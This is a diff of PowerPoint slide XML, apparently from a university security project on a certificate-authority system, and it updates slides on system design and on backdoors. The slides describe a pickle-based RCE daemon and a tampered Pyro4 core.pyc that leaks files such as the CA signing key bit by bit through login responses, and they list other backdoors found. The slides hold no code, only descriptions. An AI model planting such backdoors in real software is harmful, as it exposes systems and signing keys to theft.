+
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Backdoor 1</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Status daemon</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>(statusd)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Known </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>vulnerability in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>python </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>pickle marshaller </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0">
+                <a:sym typeface="Wingdings"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>remote </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>code </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>execution</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Direct access to </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>the web and core </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>server (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>port 4445 and 4446 )</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="524835791"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Backdoor 2</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1600200"/>
+            <a:ext cx="8229600" cy="5043905"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Compile </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>a vulnerable core.py file of the Pyro4 RPC middleware </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>into core.pyc </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>RPC checks </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>called </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>method </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>= credential_login </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>C</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>hecks </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>provided </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>username </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>has </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>certain </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>prefix</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>E</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>xtracts </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>a filename from </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>provided username</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>U</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>ses password </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>as offset n </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>T</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>ries </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>to read the nth bit of the provided </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>file</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>If </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>the bit is 0 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>returns </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>a login </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>error, successful login </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>otherwise</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Read </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>any file that the core RPC application can </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>read</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>(CA signing key)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1254974569"/>
       </p:ext>
     </p:extLst>
   </p:cSld>

--- a/presentation/Präsentation1.pptx
+++ b/presentation/Präsentation1.pptx
@@ -6,18 +6,16 @@
   </p:sldMasterIdLst>
   <p:sldIdLst>
     <p:sldId id="256" r:id="rId2"/>
-    <p:sldId id="257" r:id="rId3"/>
-    <p:sldId id="258" r:id="rId4"/>
+    <p:sldId id="258" r:id="rId3"/>
+    <p:sldId id="257" r:id="rId4"/>
     <p:sldId id="259" r:id="rId5"/>
     <p:sldId id="261" r:id="rId6"/>
-    <p:sldId id="262" r:id="rId7"/>
-    <p:sldId id="263" r:id="rId8"/>
+    <p:sldId id="263" r:id="rId7"/>
+    <p:sldId id="262" r:id="rId8"/>
     <p:sldId id="264" r:id="rId9"/>
     <p:sldId id="265" r:id="rId10"/>
     <p:sldId id="266" r:id="rId11"/>
-    <p:sldId id="267" r:id="rId12"/>
-    <p:sldId id="268" r:id="rId13"/>
-    <p:sldId id="269" r:id="rId14"/>
+    <p:sldId id="268" r:id="rId12"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3404,7 +3402,7 @@
           <a:p>
             <a:r>
               <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Comparison</a:t>
+              <a:t>Found backdoors</a:t>
             </a:r>
             <a:endParaRPr lang="de-DE" dirty="0"/>
           </a:p>
@@ -3425,79 +3423,22 @@
           <a:bodyPr/>
           <a:lstStyle/>
           <a:p>
-            <a:endParaRPr lang="de-DE" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1012491107"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Titel 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Found backdoors</a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="de-DE" dirty="0"/>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>XSS</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>rshell</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Batman</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -3514,179 +3455,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Titel 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="de-DE"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr lang="de-DE"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3335244201"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
 <file path=ppt/slides/slide2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="Titel 1"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>System design</a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr/>
-        <p:txBody>
-          <a:bodyPr/>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Introducing different trust zones</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Security in depth</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Least privilage</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>Assume external systems are insecure &amp; Isolate public access </a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>Minimize exposure </a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="de-DE" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1836761697"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -3760,6 +3529,110 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4191444827"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Titel 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>System design</a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Introducing different trust zones</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Security in depth</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Least privilage</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>Assume external systems are insecure &amp; Isolate public access </a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>Minimize exposure </a:t>
+            </a:r>
+            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="de-DE" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1836761697"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -4799,155 +4672,50 @@
             <p:ph idx="1"/>
           </p:nvPr>
         </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1433064" y="2108184"/>
-            <a:ext cx="8229600" cy="4525963"/>
-          </a:xfrm>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr>
-            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Webapplication</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Python</a:t>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>All traffic via SSH (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0"/>
+              <a:t>Protect information while being processed, in transit, and in </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>storage)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Backup/Logging (BCM, Accountability, Intrusion detection)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Local iptables (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
+              <a:t>Security in depth)</a:t>
             </a:r>
             <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Flask (CSRF, XSS)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>nginx (DDOS, HTTPS)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>RPC </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>via Pyro4</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>SSH tunnel (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>secrecy and </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>integrity)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>CA Core application</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>Python</a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
-              <a:t>pyOpenSSL </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="de-DE" dirty="0"/>
-              <a:t>m2crypto </a:t>
-            </a:r>
-            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
